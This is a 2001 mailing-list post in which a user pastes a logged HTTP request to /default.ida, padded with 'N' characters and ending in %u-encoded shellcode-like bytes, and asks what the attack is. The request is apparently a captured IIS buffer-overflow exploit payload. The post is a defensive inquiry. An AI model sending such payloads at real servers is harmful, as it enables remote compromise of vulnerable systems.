CGI Buffer Overflow?
Anyone seen this before? I have looked around for similar attacks, but
cannot find any info. I assume that is a unicode string padded out with
Ns. How would I go about finding out what is in the string?
xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a HTTP/1.0" 400 328
--Brian
Reply to: